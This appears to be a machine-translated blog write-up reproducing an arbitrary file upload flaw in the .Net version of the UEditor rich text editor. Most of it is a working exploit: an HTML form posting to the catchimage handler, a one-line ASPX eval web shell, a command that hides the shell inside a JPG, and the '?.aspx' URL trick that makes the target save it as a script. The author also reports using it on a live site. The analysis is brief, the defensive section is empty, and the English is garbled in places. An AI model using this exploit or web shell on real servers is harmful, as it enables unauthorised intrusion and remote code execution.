UEditor . Net version arbitrary file upload vulnerability recurrence

Catalog

   Vulnerability background
   Holes affect
   Exploit
   Vulnerability analysis
   Defensive measures

Vulnerability background

UEditor By Baidu WEB WYSIWYG open source rich text editor developed by front end R & D department

Holes affect

Impact of the vulnerability UEditor Of .Net edition , Other language versions are not affected for the time being .

Exploit

First prepare a html Documents are used for post Submit

<form action="http://www.xxx.com/ueditor/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr:<input type="text" name="source[]" /></p >
<input type="submit" value="Submit"/>
</form>

action Fill in the website at controller.ashx The path of
in addition ：enctype="application/x-www-form-urlencoded" What do you mean ？

open html After the following

At this time, we need a server to put the image Trojan , Servers can go to Alibaba cloud 、 Huawei cloud and others apply for free

We're going to prepare a 2.jpg With a pony 3.aspx, The pony code is as follows

<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

use cmd Command composite picture Trojan horse

copy 2.jpg/b + 3.aspx/a 1.jpg

We upload this trojan horse to our server , Remember the server image path

Prior to shell addr Fill in the following parameters

http://x.x.x.x/1.jpg?.aspx

http://x.x.x.x/1.jpg Is the address of our server followed by .aspx To generate aspx file , The page after submission is as follows

The file path we upload should be as follows

http://www.xxx.com/ueditor/net/upload/2206/2206-63790xxxxxxx0006134716.aspx

But I can't link it , Later I learned that the source code of the server was changed

The path here is guessed by chance , Normally, it should be prefixed

Here it is , So the Trojan path should be

http://www.xxx.com/upload/2206/2206-63790xxxxxxx0006134716.aspx

I found that the server had been invaded , And left the back door , I guess it's the source code changed by the intruder before

Vulnerability analysis
UEditor When capturing remote data sources , Will enter "catchimage" Branch

The cause of the vulnerability is that only ContentType, As a result, any file upload can be bypassed .

java Nah , Unable to analyze the source code , Wait until I finish my study

Defensive measures